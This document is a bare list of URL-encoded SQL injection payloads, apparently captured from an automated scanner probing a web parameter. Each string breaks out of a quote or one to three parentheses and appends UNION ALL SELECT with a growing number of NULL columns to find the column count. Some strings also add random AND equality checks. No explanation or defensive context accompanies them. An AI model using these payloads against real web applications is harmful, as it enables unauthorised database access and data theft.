1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289650%3D9650 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287280%3D7280 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287364%3D7364 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288281%3D8281 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281850%3D1850 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286644%3D6644 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287080%3D7080 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288849%3D8849 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%283805%3D3805 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287194%3D7194 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288383%3D8383 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287135%3D7135 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283297%3D3297 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282816%3D2816 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287796%3D7796 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%285277%3D5277 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282042%3D2042 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287106%3D7106 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%289792%3D9792 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282213%3D2213 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%288004%3D8004 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281016%3D1016 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283220%3D3220 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283016%3D3016 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283908%3D3908 